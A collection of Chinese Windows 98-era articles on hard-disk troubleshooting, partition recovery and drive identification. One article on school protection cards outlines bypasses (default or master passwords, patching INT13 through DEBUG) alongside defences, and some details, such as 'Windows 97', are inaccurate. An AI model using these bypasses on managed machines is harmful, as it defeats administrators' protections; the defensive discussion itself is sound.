    无奈之下只好“请出”硬盘大师DM了，为了能提高兼容性和稳定性，我特意从网站上下载了最新版的DM956cy。正当我准备实施下一步计划时，希捷硬盘上的英文标签引起了我的注意：在跳线的标示中除了Master、Slaver、CableSelect以外还有一项：Limit capacity of 32GB，从字面上的意思看是如果跳线至此可以限制硬盘容量在32GB上。若果真如此，我是否可以先让BIOS把硬盘识别成32GB，安装操作系统后，再利用其他分区软件找到剩下的8GB呢？想到这儿我突然兴奋起来。但现在问题是这块老主板能否识别出32GB硬盘容量？不过凭我的经验一般容量限制在528MB、2.1GB、8.4GB、32GB……这几个挡，看来还是很有希望的。

    关机后，跳好线，重新开机进入BIOS，检测IDE设备……系统立刻检测出该硬盘容量是32GB！已经成功一半了，接着我用软盘启动，并用FDISK分区，在FDISK中也显示硬盘容量为32GB，为了保险起见，我只分了一个主分区为5GB并激活它，然后重启格式化并安装了Windows 98，一切正常。最后在Windows 98中安装分区大师PQMAGIC，启动该程序查到只有主分区，大概有27GB容量没有分区格式化，看来剩下的8GB没有被找到！虽然不影响使用，但那8GB的空间就这样白白浪费吗？我并不死心，拿出最后一招：把该希捷硬盘挂到能识别大容量硬盘的电脑上，同样利用PQMAGIC把剩下的所有容量分区并格式化好，然后再挂回到好友的电脑上。启动电脑进入Windows 98，再次用PQMAGIC检测，果然主分区和扩展分区之和为40GB（实际为38GB），至此硬盘所有容量都可以使用了！不过需要注意的是，虽然在Windows下可以正常使用全部容量，但由于BIOS仍然识别硬盘为32GB，所以在DOS中最后8GB的逻辑盘是无法使用的，不过我想也没关系，毕竟我们现在很少使用DOS模式了！


修复硬盘坏道

《一键清理系统垃圾》

修复硬盘坏道

    计算机中最娇气的部件应该是硬盘了。虽然随着制造工艺的不断进步，这种情况有所转变，一些硬盘厂家如昆腾也发布了相关的新技术，比如昆腾七代开始使用的为减少硬盘受到的冲击力而开发的SPS震动防护系统，以此指望硬盘的身体“ 强健”起来。但硬盘易坏的缺点并没有得到根本的改变。对于喜欢追新的个人电脑用户来说，硬盘的更新频率一般没有CPU 或显示卡那么快--即使要买新硬盘，老硬盘也要挂在机箱里发挥余热，所以人们特别不愿意看到硬盘出故障，尤其是硬盘中保存了珍贵的数据资料时。硬盘属逻辑损坏倒也罢了，大不了重装软件，但物理损坏呢？其实只要情况不是特别严重，用一些方法处理，一般也能解决问题。

    首先来看看硬盘有了物理损伤，也就是有了坏道后有哪些现象。

    1.读取某个文件或运行某个软件时经常出错，或者要经过很长时间才能操作成功，其间硬盘不断读盘并发出刺耳的杂音，这种现象意味着硬盘上载有数据的某些扇区已坏。

    2.开机时系统不能通过硬盘引导，软盘启动后可以转到硬盘盘符，但无法进入，用SYS命令传导系统也不能成功。这种情况比较严重，因为很有可能是硬盘的引导扇区出了问题。

    3.正常使用计算机时频繁无故出现蓝屏。

    对于前面3种情况，我们一般都有办法作或多或少地补救。以下提供了几种方法来对硬盘的坏道作修复，要注意的是，应该优先考虑排在前面的方法。

    1.首先从最简单的方法入手。在Windows98的资源管理器中选择硬盘盘符，右击鼠标，在快捷菜单中选择 “属性”，在“工具”项中对硬盘盘面作完全扫描处理，并且对可能出现的坏簇作自动修正。对于以上第2种情况即不能进入 Windows98的现象，则可以用Windows98的启动盘引导机器，然后在“A：>”提示符后键入“scand isk X：”来扫描硬盘，其中“X”是具体的硬盘盘符。对于坏簇，程序会以黑底红字的“B”（bad）标出。

    2.实际上，第1种方法往往不能奏效，因为Windows98对“坏道”的自动修复很大程度上是对逻辑坏道而言，而不能自动修复物理坏道，所以有必要考虑对这些坏道作“冷处理”。所谓“冷处理”就是在这些坏道上作标记，不去使用，惹不起还躲得起。记住第1种方法中坏道的位置，然后把硬盘高级格式化，将有坏道的区域划成一个区，以后就不要在这个区上存取文件了。要说明的是，不要为节约硬盘空间而把这个区划得过分“经济”，而应留有适当的余地，因为读取坏道周围的“好道”是不明智的--坏道具有蔓延性，如果动用与坏道靠得过分近的“好道”，那么过不了多久，硬盘上新的坏道又将出现。

    3.用一些软件对硬盘作处理，其中最典型的是PartitionMagic了。这里以4.0版本为例：扫描硬盘可以直接用PartitionMagic4中的“check”命令来完成，但该命令无自动修复功能，所以最好在Pa rtitionMagic4中调用Windows98的相关程序来完成这个任务。标记了坏簇后，可以尝试着对它进行重新测试，方法是在Operations菜单下选择“Advanced/bad Sector Retest”；把坏簇分成一个（或多个）区后，可以考虑把该区隐藏，以免在Windows98中误操作，这个功能是通过Hide Part ition菜单项来实现的。要特别注意的是，如果没有经过格式化而直接将有坏簇的分区隐藏的话，那么该分区的后续分区将由于盘符的变化而导致其中的一些与盘符有关的程序不能正确运行，比如一些软件在桌面上建立的快捷方式将找不到宿主程序，解决之道是利用Tools菜单下的DriveMapper菜单项，它会自动地收集快捷方式和注册表内的相关信息，并对它们作正确的修改。特别指出的是，在较新版的PartitionMagic5.0 Pro中，DriveMapp er也升级成了3.0版本，从而使该项工作变得更加高效和简洁。另外，DiskManager这个软件也能做这个工作。隐藏了分区后，不要试图把坏道所在的分区的前后分区合并--那是徒劳无益的，因为这两个分区在物理上并不连续。

    4.对于硬盘0扇区损坏的情况，看起来比较棘手，但也不是无药可救--只要把报废的0扇区屏蔽，而用1扇区取而代之就行了，完成这项工作的理想软件是Pctools9.0，具体地说，是Pctools9.0中的DE工具，要注意的是，修改扇区完成后，只有对硬盘作格式化后才会把分区表的信息写入1扇区（现在作为0扇区了）。

    5.不到万不得已，这一招最好不要用：即对硬盘作低格。因为对硬盘作低格至少有两点害处：一是磨损盘片，二是对有坏道的硬盘来说，低格还会加速坏道的扩散。

    6.最后还有一点，那就是主板BIOS的相关内容要设置得当，特别是对于一些TX芯片组级别以前的主板，由于没有自动识别硬盘规格的能力，往往会因设置不当而影响硬盘的使用，轻则硬盘不能物尽其用，重则损伤硬盘。

    以上介绍的是硬盘有物理损伤时的解决方法。但是，这些方法大多数是消极的，是以牺牲硬盘容量为代价的。硬盘有了坏道，如果不是因为老化问题，则说明平时在使用上有不妥之处，比如对硬盘过分频繁地整理碎片、内存太少以致应用软件对硬盘频频访问等。而忽略对硬盘的防尘处理也会导致硬盘磁头因为定位困难引发机械故障。另外，对CPU超频引起外频增高，迫使硬盘长时间在过高的电压下工作，也会引发故障，所以，平时对硬盘的使用还应以谨慎操作为上策。


一次硬盘数据恢复的经验

《一键清理系统垃圾》

一次硬盘数据恢复的经验

介绍：

    硬盘作为用户存储数据的主要场所，其最大的用途莫过于存储数据，但有时往往由于用户操作不甚等原因，造成用户数据的丢失。如果对于普通用户，数据对用户相对而言并不重要，那么丢了就丢了，没太大关系；但如果数据对用户很重要（对于这类用户，AWU推荐应经常备份数据），这时数据丢失了怎么办呢？此文就是通过一次对硬盘数据的恢复过程分析来简要说明一下硬盘数据恢复的大概方法，希望对大家恢复硬盘数据有一定的积极作用。

相关概念：

    MBR（MAIN BOOT RECORD）即主引导记录区，它位于整个硬盘的0磁道0柱面1扇区，包括硬盘引导程序和分区表。

    DBR（DOS BOOT RECORD）即操作系统引导记录区，通常位于硬盘的0磁道1柱面1扇区，是操作系统可直接访问的第一个扇区，它也包括一个引导程序和一个被称为BPB（BIOS PARAMETER BLOCK）的本分区参数记录表。每个逻辑分区都有一个DBR。

    FAT(file allocation table)即文件分配表，是dos,windows9X系统的文件寻址格式，为了数据安全起见，FAT一般做两个， 二FAT为第一FAT的备份。

    DIR 是DIRECTORY即根目录区的简写，DIR紧接在第二FAT表之后。

估计数据丢失原因：

    1、安装多系统引导软件后，异常操作造成。

    2、遭到某种病毒感染。 数据丢失前状态：2.5G 硬盘，原分区为：C：2G + D：500M，D盘装有重要数据。两分区均为FAT16格式。

数据丢失过程：

    一次系统重启后，D盘丢失。

数据丢失后的操作：

    该客户曾用FDISK重新分区，试图按原分区大小再造分区，未果。但没有格式化D盘，只格式化了C盘并重装系统。

客户的数据修复要求：

    恢复D盘根目录下"数码相机"目录内所有文件。

所用工具：

    NORTON DISK DOCTOR：diskedit.exe

数据修复过程：

    一、 数据备份：主要包括物理0磁道各扇区，各分区逻辑0磁道，FAT表和根目录区等，再配以GHOST备份各分区的数据区。

    二、 分析该硬盘的主引导扇区MBR（包括主分区表和引导程序）、各分区的引导扇区DBR、FAT表及根目录区。

    由于已经重新分区并能顺利启动C盘（抛开病毒原因），故MBR的逻辑结构应该没问题，通过DISKEDIT察看MBR所在的0磁道第一扇区，证实估计正确，但现分区表与原分区表是否完全一致，还不能确定。

    通过分区表，可以查找到各分区的引导扇区所在的物理位置，分析后可确定C盘的各项重要数据(引导扇区、第一FAT表、 二FAT表、根目录区)均没有异常，但D盘除了引导扇区DBR外、上诉的其他数据均无法对应，DBR之所以无异常，是因为重新分区的结果，而FAT1、FAT2和根目录区面目全非的原因，大致应该有两种可能：一是现分区与原分区不一致，导致数据对不上号；二是数据已被病毒破坏。

    由于在察看MBR时，发现0磁道的其他扇区留有不明程序的残余代码，通过察看其中的一些显示信息，可以判定是某种多系统软件留下的，说明客户曾经安装过多系统管理软件。这样大致可以排除病毒破坏分区的可能，分区丢失应该是异常操作多系统管理软件引起的。

    三、 寻找原有分区 根据前面的分析，由于客户在数据丢失后又进行了重新分区，而且估计现有的分区与原来的分区不一致，这样无疑加大了数据修复的难度，但幸好没有格式化D盘，因为如果单单只是FDISK，只会改写原硬盘的各分区的第一扇区，如果这个扇区不落在原分区的重要参数区（DBR、FAT、根目录）上，那么修复的成功率还是挺高的。 接下来就是寻找原有D盘的重要数据区了，根据客户提供的资料可知，原D盘根目录下有一叫"数码相机"的子目录，于是用DISKEDIT提供的搜索功能，搜索"数码相机"对应的十六进制代码，可以找到原有D盘的根目录区。历时30分钟，通过过滤搜索结果，最终找到该根目录所在的扇区，然后顺藤摸瓜，向前翻过两个FAT表（根据经验大概400-500个扇区）找到原D盘的DBR所在的扇区，接着再向前翻63个扇区，找到原D盘的分区表，至此，最困难的问题攻克了。

    四、 重建主分区表 因为客户后来用FDISK重新建立的主分区表与原来的分区表并不一致，故必须手工重建原分区表，通过前面找到的原D盘分区表和原D盘的DBR，可以计算出主分区表。包括各分区的起始、结束扇区、分区大小、分区类型等。算出结果后，改写0磁道1扇区的主分区表。

    五、 重启系统，出现原D盘，所有文件基本全部恢复。拷贝出"数码相机"目录，做好备份。通知客户取回数据。

有关本次案例的说明：

    1、 数据备份时，不要过分相信ghost，ghost只认正确的分区，对于隐藏的分区它不会复制。对于不正确的分区，它会报告错误并停止复制过程。Ghost 并非一个纯粹意义上的全盘复制软件，它只复制那些FAT表上存在的文件，而非复制磁盘上所有的数据！

    2、 走运的是，该客户重新分的D盘刚好比原D盘大几个磁道，故新的D盘分区表被建在原C盘最后端的数据区中。所以本次基本上可以说是100%恢复了原D盘的数据了。

    3、 更走运的是，该客户没有重新格式化D盘，不然就不可能有那么高的恢复率了。

给读者的建议：

    在硬盘数据出现丢失后，请立即联系当地的数据修复公司。最好不要再对硬盘进行写操作，那样会增大修复的难度，也影响到修复的成功率。


一分钟教你辨别返修硬盘

《一键清理系统垃圾》

一分钟教你辨别返修硬盘

    最近一段时间，一些来历不明的返修硬盘流入市场，有不少朋友都吃了亏，为了让大家知道如何来辨别返修硬盘，我将我所了解的区别方法告诉大家。

    因为硬盘的技术含量比较高，全世界也就这么几个地方可以生产，所以在保修期内的硬盘，都是返回到原厂家去修理，而厂家在维修硬盘之后，会在盘面上做出相应的标识，这成了我们区别的重要标志了，不过因为是用英语书写的，如果不注意可能会忽略过去。如图中的WD硬盘，在图中所示的圆圈里，日期后而有一个“R”字母，这证明圆圈标注的是返修的日期，而不是生产日期；另外在标注方框中，仔细看可以看到浅蓝色的“REFURBISHED”（英语整修的意思）字样，在右上角还有一个比较显眼的“Refurbished”，大家在硬盘上看到这样的标记，就一定不要购买了。另外，如果硬盘的价格比别处要便宜很多，也有可能是返修硬盘，还是“便宜不要贪”。

    最后，大家在购买硬盘时，最好还是到正规代理商那里去购买，也算是花钱买个放心。


移动硬盘故障的5种可能

《一键清理系统垃圾》

移动硬盘故障的5种可能

    为了能够便捷地存储大容量文件，很多朋友都购买了USB接口的移动硬盘，可是在使用的时候却发现系统无法识别移动硬盘。这是为什么呢？各位先不要着急，就让我们动手让移动硬盘为我所用吧。

    一、设置CMOS参数

    对于从来没有使用过USB外接设备的朋友来说，即使正确安装了驱动程序也有可能出现系统无法检测USB硬盘的情况，这主要是由于主板默认的CMOS端口是关闭的，如果没有将其设置为开启状态，那么Windows自然无法检测到移动硬盘了。为了解决这个问题，我们可以重新开机，进入CMOS设置窗口，并且在“PNP/PCI CONFIGURATION”栏目中将“Assign IRQ For USB”一项设置为“Enable”，这样系统就可以给USB端口分配可用的中断地址了。

    二、电源不足

    由于USB硬盘在工作的时候也需要消耗一定的电能，如果直接通过USB接口来取电，很有可能出现供电不足。因此，几乎所有的移动硬盘都附带了单独的外接电源或者是通过键盘取电的PS2转接口。这时只要事先连接好外接电源或者通过PS2转接线与键盘连接好，确保给移动硬盘提供足够的电能之后再试试，应该可以正常使用了吧。需要特别提醒大家注意的是，用移动硬盘之前都确保有足够的供电，否则很可能由于供电不足导致硬盘损坏。

    三、USB延长线故障

    除去上述两方面原因之外，还有可能是USB接口类型不符导致移动硬盘无法使用。比如，计算机配置的USB接口是1.1标准的，而购买的移动硬盘是USB 2.0标准的接口，这就要求连接计算机和移动硬盘的连接线必须支持USB 2.0标准。因为高速移动设备插入低速集线器，该设备可能不被正常安装，而有些朋友在使用移动硬盘的同时还使用优盘，为了方便就直接使用优盘附送的USB 1.1标准连接线，这样就导致USB 2.0标准的移动硬盘无法正确识别。只要将连接线更换为USB 2.0标准的即可解决此故障。

    四、Windows版本太低

    对于一些还在使用Windows 95或者Windows 97系统的朋友来说，即使计算机配备了USB接口，但是由于Windows 98之前的操作系统不支持USB外设，因此无论如何安装驱动程序、设定CMOS参数都无法让移动硬盘正常使用。对于这种情况，一种解决方法是将操作系统升级到Windows 98以上，另外一种方法就是到微软官方站点下载相应的补丁程序让Windows 95/97能够识别移动硬盘。

    五、系统设置不当

    对于一些Windows 98用户来说，在安装好驱动程序之后，可以从设备管理器中查看到移动硬盘图标，但是在资源管理器中却没有相应的盘符标识，这就是系统设置不当所致。在设备管理器中双击移动硬盘图标，并且点击弹出窗口中的“属性”按钮，此时可以看见断开、可删除、同步数据传输和Int 13单元4个选项，其中“可删除”一项前面系统默认是没有打勾的，只要勾选这个选项之后重新启动计算机，就可以在资源管理器中看见新增的移动硬盘盘符了。

    一言以蔽之，移动硬盘无法识别的故障原因比较多，但一般都不是USB接口或者移动硬盘本身的故障，因此需要大家在排除的时候多从周围关联部分考虑，相信你也可以顺利使用移动硬盘的。


硬件复位排故障

《一键清理系统垃圾》

硬件复位排故障

   所谓硬件复位是指将所有的硬件参数恢复到初始值，即彻底关机后重启（从电源完全关闭状态下重启，亦称冷启动）。
   硬件复位可以排除各种硬件逻辑故障（当然也包括软件）。在微机使用过程中，偶然出现一些“疑难杂症”，不妨关机冷启动一次。请看下面的实例：
   【例1】一台赛扬组装机，键盘出现连击现象，无论按下哪个按键都是一连串的字符，无法控制和使用。重新启动（热启动）进入CMOS设置，调整有关参数，并且选择优化的缺省参数设置，结果还是无效。无奈之下，彻底关机，停半分钟之后再次开机，一切恢复正常。
   【例2】一台Acer奔腾Ⅲ/1G原装机，使用打印机出现异常，出现怪字符、频繁走纸，重新安装驱动程序无效，重新热启动也无效。而在其它机器上使用，证明该打印机正常。此时发现，该机喇叭也不响，而检查接线等则完全正常。由此想到：该机可能是硬件参数异常，同时影响到上述两个部分。于是，采取完全关闭机器做法。再次打开机器，一切恢复正常了。
   【例3】一台Acer奔腾Ⅲ/800原装机，开机进入到网络用户名/口令设置时死机，键入口令“确定”（或者按回车键）后鼠标停止运动，即使选择取消口令也无济于事。经检验证明，网线及鼠标器均无问题。实施Win 98的关机操作，结果也没有奏效，该机箱后面有个电源总开关，于是将其关闭。再次打开机器，一切恢复正常。 　　其实，类似上面的例子还有很多，诸如网络不通、显示异常、汉字输入消失以及多种情况下的死机现象，不胜枚举。
   电脑的绝大部分故障是软件和硬件的逻辑故障，前者可以通过“注销”（相当于快速重新启动）、“重新启动”来解决，而后者只能由硬件的全面复位来排除。


因磁盘上存在错误而无法安装Windows 98

《一键清理系统垃圾》

因磁盘上存在错误而无法安装Windows 98

    （江苏 许向前）答：在安装Windows 98操作系统时，“磁盘扫描程序”检测到D盘有错误，致使安装程序无法继续进行。遇到这种情况，如果急着用的话，可以在安装Windows 98时加上一个参数“/is”，即输入“Setup /is”，这样的话，可以跳过磁盘扫描进行安装。等进入Windows桌面后，再选择“磁盘扫描程序”对D盘进行扫描和修复即可。

    如果不急着用的话，可以用一些磁盘修理工具进行修复，修复后再进行安装。如在DOS状态下，执行Windows 98启动盘上的Scandisk.exe命令，输入“Scandisk D：”，回车，待检查出错误时会弹出提示框，选择“Fix it”一项，修复完毕后，选择“Exit”退出，再安装Windows 98就不会报错了


硬盘保护卡安全漏洞及解决办法

《一键清理系统垃圾》

硬盘保护卡安全漏洞及解决办法

    硬盘保护卡在学校的机房管理中占有很重要的地位，基本上达到了“一卡无忧”的目标。但是随着互联网技术的发展，特别是针对破解保护卡的文章不时在网上出现，有了保护卡就可以高枕无忧的想法就不再现实了，保护卡的安全性面临着新的考验。

    怎样防止保护卡被破解呢？这就得从保护卡的原理谈起了。保护卡的工作原理简单来讲就是它接管对硬盘进行读写操作的一个INT13中断，保护卡在系统启动的时候首先用它自己的程序接管INT13中断地址。这样，只要是对硬盘的读写操作都要经过保护卡的保护程序进行保护性的读写，也就是先将FAT文件分配表、硬盘主引导区、CMOS信息、中断向量表等信息都保存到保护卡内的临时储存单元中。用来应付我们对硬盘内数据的修改。每当我们向硬盘写入数据时，其实还是完成了写入到硬盘的操作，可是没有真正修改硬盘中的FAT。而是写到了备份的FAT表中，这就是为什么系统重启后所有写操作一无所有的原因了。这也就是硬盘保护卡的主要工作原理。

    了解了保护卡的工作原理，我们就知道了破解保护卡的核心问题就是对系统启动后INT13的控制权问题和保护卡的管理员密码的问题。所以对保护卡安全威胁来自于以下两种方式的攻击：

    针对保护卡管理员密码的攻击

    一般有三种手段；

    1. 利用默认密码的攻击。一般的保护卡都有一个默认密码，这些默认密码都很简单。所以针对这种攻击的防护就是一定要修改管理员密码。

    2. 利用保护卡的万能密码的攻击。一般保护卡都有自己的万能密码，根据保护卡的型号、批次、类型的不同而不同，厂商也许考虑到管理者遇到密码遗失问题而设了这个后门。但在网上的确可以找到这种万能密码。所以这种破解也是很危险的。遇到这种问题我们只有寄希望于保护卡厂家的版本升级了。

    3. 针对存在于硬盘主引导区的保护卡密码的直接攻击。这就不是我们用户能解决的问题了，而是保护卡厂方的责任与义务。

    针对INT13的控制权的攻击

    其实只要有简单的计算机知识的人在一分钟内就可以破解，就如破解CMOS的密码一样简单。这里只是把他们的破解工具主要方法简要说明一下。DEBUG就是他们的利器，一般方法是利用四五条汇编语言就可很轻松地修改INT13的中断入口，使保护卡不起保护作用了。我个人了解到的解决办法如下：

    1. 一般来讲这种攻击是在DOS方式或Windows 98的命令行方式下进行的，所以怎么样禁止DOS命令方式是解决该问题的关键。最好的办法就是把Windows 98系统平台改为Windows 2000平台，在这种平台下DOS攻击方式是没有用武之地的。

    2. 如果仍然还是用Windows 98平台，也有解决这种攻击的方法，利用魔法兔子98或魔法兔子2000对注册表进行修改，禁用DOS命令方式与DOS实模式，禁用启动时的F8、F4功能，禁用开始菜单中的执行与关机功能（可以在桌面上建一个关机的快捷图标来关机）。删除Debug.exe文件（尽可能在Windows 98的安装包中把这个文件也给删除后再压缩，以防从压缩包中重新释放）。尽可能地把FAT16文件格式转换为FAT32文件格式。CMOS的优先启动顺序最好是第一为LAN，第二为C，千万不要把A盘设计第一启动顺序。保护卡一定要保护CMOS。

    技术的防范是有限的，我个人总结最好的办法就是随时与学生交流，引导他们正确学习、使用技术。

作者：崔永明
来源：中国电脑教育报


硬盘编号一点通

《一键清理系统垃圾》

硬盘编号一点通

    目前，市面上的硬盘品牌大家已经耳熟能详，规模较大的厂商也无非就是IBM、昆腾（Quantum）、西捷（Seagate）等几家“名牌老字号”，不过，随着硬盘产品的不断推陈出新，对于各品牌硬盘型号的编号大多数用户已经难以解读。其实，每个厂家的每款硬盘编号都有其一定的内在规律，而每串编号也都代表着硬盘本身特定的含义，而通过这些复杂的编号，用户可以更确切的了解硬盘的各种性能指标，包括接口类型、转速、容量、缓存等。

    1、IBM

    IBM的每一个产品又分为多个系列，其硬盘产品的命名方式为：“产品名+系列代号+接口类型+盘片尺寸+转速+容量”。以Deskstar 22GXP的13.5GB硬盘为例，该硬盘的型号为：DJNA-371350，字母D代表Deskstar产品，JN代表Deskstar 25GP与22GP系列，A代表ATA接口，3代表3英寸盘片，7代表7200RPM产品，最后4位数字为硬盘容量13.5GB。

    IBM系列代号（IDE）含义如下：TT=Deskstar 16GP或14GXP；JN=Deskstar 25GP或22GXP；RV=Ultrastar 18LZX或36ZX。 接口类型含义如下：A=ATA，S与U=Ultra SCSI，Ultra SCSI Wide，Ultra SCSI SCA，增强型SCSI，增强扩展型SCSI（SCA），C=Serial Storage Architecture；连续存储体系SCSI，L=光纤通道SCSI。

    2、Maxtor（迈拓）

    Maxtor硬盘的编号规则是：“首位+容量+接口类型+磁头数”。Maxtor从钻石四代开始，其首位数字就为9，一直延续至今，因此大家现在能够在市场上见到的Maxtor硬盘其首位数字大多数都是9。另外，比较特殊的是Maxtor编号中有磁头数这一概念，因为Maxtor硬盘是大打单碟容量的发起人，所以其硬盘的型号中要将单碟容量的磁头数体现出来。

    单碟容量=2×硬盘总容量/磁头数，以金钻三代（DiamondMax Plus6800）10.2GB的硬盘为例说明：该硬盘型号为91024U3，9是首位，1024是容量，U是接口类型UDMA/66，3代表该硬盘有3个磁头，也就是说其中的一个盘片是单面有数据，这个单碟容量是2X10.2/3=6.8GB。Maxtor硬盘接口类型字母含义：A=PIO模式，D=UDMA/33模式，U=UDMA/66模式。

    3、Seagate（希捷）

    希捷的硬盘系列从低端到高端的产品名称分别为：U4系列、Medalist（金牌）系列、U8系列、Medalist Pro（金牌Pro）系列、Barracuda（酷鱼）系列、Barracuda II（酷鱼 II）系列、Barracuda III（酷鱼 III）系列。其中Medalist Pro、Barracuda（酷鱼）系列、Barracuda II（酷鱼 II）系列与Barracuda III（酷鱼 III）系列是7200RPM的产品，其他的是5400RPM的产品。硬盘的型号均以ST开头，现以酷鱼10.2GB硬盘为例说明。该硬盘的型号是：ST310220A，在ST后第一位数字是代表硬盘的尺寸，3就是该硬盘采用3.5英寸的盘片，3后面的1022代表的是该硬盘的格式化容量是10.22GB，最后一位数字0是代表7200RPM产品。这一点不要与希捷以前的入门级产品Medalist ST38240A混淆。大多数希捷的Medalist Pro系列，以0结尾的产品均代表7200RPM硬盘，其他数字结尾（包括1、2）代表5400RPM产品。位于型号最后的字母是硬盘的接口类型。 希捷硬盘的接口类型字母含义如下： A=ATA UDMA/33或UDMA/66 IDE接口； AG为笔记本电脑专用的ATA接口硬盘； W为Ultra Wide SCSI，其数据传输率为40MB/s； N为Ultra Narrow SCSI，其数据传输率为20MB/s； 而ST34501W/FC和ST19101N中的FC（Fibre Channel）表示光纤通道，可提供高达100MB/s的数据传输率，并且支持热拔插。

    4、Quantum（昆腾）

    昆腾硬盘的型号一般在盘体的条形标记上，可以在硬盘接口附近的外盘盖上找到。以EX64A012为例，其前两位的字母时表示硬盘类型，该例中EX指火球EX系列。第三四位的数字表示次硬盘的容量。第五位的字母是表示接口类型。接口字母的不同含义是这样的：A=ATA（IDE），S=SCSI，50-pin Sigle Ended；W=SCSI Wide，68-pin Sigle Ended；D=SCSI Wide，68-pin Differential。


硬盘不能分区的困惑

《一键清理系统垃圾》

硬盘不能分区的困惑

    一天，朋友打来电话说，他用FDISK给硬盘重新分区时，遇到了一件非常奇怪的事情，就是原扩展分区怎么也删不掉（朋友用的是品牌机）！竟然有这种事情？

    来到朋友家，我用软盘启动电脑，进入FDISK，发现该硬盘的容量为40GB，扩展分区占了25GB，没有逻辑盘（早被他删了）。于是依次进入“Delete partition Or Longical Dos Drive——Delete Extended Dos partition”菜单，删除扩展分区，然而却提示“Cannot delete Extended Dos partitionWhile logical drives exist”（当逻辑盘存在时不能删除扩展分区），咦，怎么回事？不是没有逻辑盘吗！为了再次确认，我又依次进入“Delete partition Or Longical Dos Drive——Delete Logical Dos Drive（s）in the Extended Dos partition”菜单，删除逻辑盘，却提示“No logical drives defined”（没有定义的逻辑盘）。

    真是怪了，FDISK为什么会自相矛盾呢？莫非品牌电脑为了保护硬盘做了什么手脚？想到此，我脑中忽然一亮，许多电脑厂商为了减轻顾客重装系统的苦恼，将系统装好后做了备份，放到一个专门的分区里，莫不是该品牌电脑也有个专门存放备份系统的分区，而且被隐藏起来了？由于FDISK本身不能查看分区是否隐藏，只好借助PQmagic工具软件，进入PQmagic查看硬盘，果然有一个分区被隐藏了，点击取消隐藏后退出PQmagic。当再次进入FDISK后，发现了一个逻辑盘，进入“Delete partition Or Longical Dos Drive——Delete Logical Dos Drive（s）in the Extended Dos partition”菜单，删掉逻辑盘。又进入“Delete partition Or Longical Dos Drive——Delete Extended Dos partition”菜单中，扩展分区终于被成功删除。


硬盘

《一键清理系统垃圾》

硬盘

[color=Green]硬盘是负责存储我们的资料的软件的仓库，硬盘的故障如果处理不当往往会导致系统的无法启动和数据的丢失，那么，当我们应该如何应对硬盘的常见故障呢？[/color]
[color=Red]常见故障一：系统不认硬盘 [/color]
[color=Blue]系统从硬盘无法启动，从A盘启动也无法进入C盘，使用CMOS中的自动监测功能也无法发现硬盘的存在。这种故障大都出现在连接电缆或IDE端口上，硬盘本身故障的可能性不大，可通过重新插接硬盘电缆或者改换IDE口及电缆等进行替换试验，就会很快发现故障的所在。如果新接上的硬盘也不被接受，一个常见的原因就是硬盘上的主从跳线，如果一条IDE硬盘线上接两个硬盘设备，就要分清楚主从关系。
[/color]

[color=Red]常见故障二：硬盘无法读写或不能辨认 [/color]
[color=Blue][这种故障一般是由于CMOS设置故障引起的。CMOS中的硬盘类型正确与否直接影响硬盘的正常使用。现在的机器都支持“IDE Auto Detect”的功能，可自动检测硬盘的类型。当硬盘类型错误时，有时干脆无法启动系统，有时能够启动，但会发生读写错误。比如CMOS中的硬盘类型小于实际的硬盘容量，则硬盘后面的扇区将无法读写，如果是多分区状态则个别分区将丢失。还有一个重要的故障原因，由于目前的IDE都支持逻辑参数类型，硬盘可采用“Normal,LBA,Large”等，如果在一般的模式下安装了数据,而又在CMOS中改为其它的模式，则会发生硬盘的读写错误故障，因为其映射关系已经改变，将无法读取原来的正确硬盘位置。/color]

[color=Red]常见故障三：系统无法启动 [/color]
[color=Blue]造成这种故障通常是基于以下四种原因：
    1. 主引导程序损坏
    2. 分区表损坏
    3. 分区有效位错误
    4. DOS引导文件损坏
    其中，DOS引导文件损坏最简单，用启动盘引导后，向系统传输一个引导文件就可以了。主引导程序损坏和分区有效位损坏一般也可以用FDISK /MBR强制覆写解决。分区表损坏就比较麻烦了，因为无法识别分区，系统会把硬盘作为一个未分区的裸盘处理，因此造成一些软件无法工作。不过有个简单的方法——使用Windows 2000。找个装有Windows 2000的系统，把受损的硬盘挂上去，开机后，由于Windows 2000为了保证系统硬件
的稳定性会对新接上去的硬盘进行扫描。Windows 2000的硬盘扫描程序CHKDSK对于因各种原因损坏的硬盘都
有很好的修复能力，扫描完了基本上也修复了硬盘。

    分区表损坏还有一种形式，这里我姑且称之为“分区映射”，具体的表现是出现一个和活动分区一样的分区。一样包括文件结构，内容，分区容量。假如在任意区对分区内容作了变动，都会在另一处体现出来，好像是映射的影子一样。我曾遇上过，6.4G的硬盘变成8.4G(映射了2G的C区)。这种问题特别尴尬，这问题不影响使用，不修复的话也不会有事，但要修复时，NORTON的DISKDOCTOR和PQMAGIC却都变成了睁眼瞎，对分区总容量和硬盘实际大小不一致视而不见，满口没问题的敷衍你。对付这问题，只有GHOST覆盖和用NORTON的拯救盘恢复分区表。
[/color]

[color=Red]常见故障四：硬盘出现坏道 [/color]
[color=Blue]这是个令人震惊，人见人怕的词。近来IBM口碑也因此江河日下。当你用系统Windows　系统自带的磁盘扫描程序SCANDISK扫描硬盘的时候，系统提示说硬盘可能有坏道，随后闪过一片恐怖的蓝色，一个个小黄方块慢慢的伸展开，然后，在某个方块上被标上一个“B”……

    其实，这些坏道大多是逻辑坏道，是可以修复的。根本用不着送修（据说厂商之所以开发自检工具就是因为受不了返修的硬盘中的一半根本就是好的这一“残酷的”事实）。

    那么，当出现这样的问题的时候，我们应该怎样处理呢？

    一旦用“SCANDISK”扫描硬盘时如果程序提示有了坏道，首先我们应该重新使用各品牌硬盘自己的自检程序进行完全扫描。注意，别选快速扫描，因为它只能查出大约90%的问题。为了让自己放心，在这多花些时间是值得的。

    如果检查的结果是“成功修复”，那可以确定是逻辑坏道，可以拍拍胸脯喘口气了；假如不是，那就没有什么修复的可能了，如果你的硬盘还在保质期，那赶快那去更换吧。

    由于逻辑坏道只是将簇号作了标记，以后不再分配给文件使用。如果是逻辑坏道，只要将硬盘重新格式化就可以了。但为了防止格式化可能的丢弃现象（因为簇号上已经作了标记表明是坏簇，格式化程序可能没有检查就接受了这个“现实”，于是丢弃该簇），最好还是重分区，使用如IBM DM之类的软件还是相当快的，或者GHOST覆盖也可以，只是这两个方案都多多少少会损失些数据。
[/color]

[color=Red]常见故障五：硬盘容量与标称值明显不符 [/color]
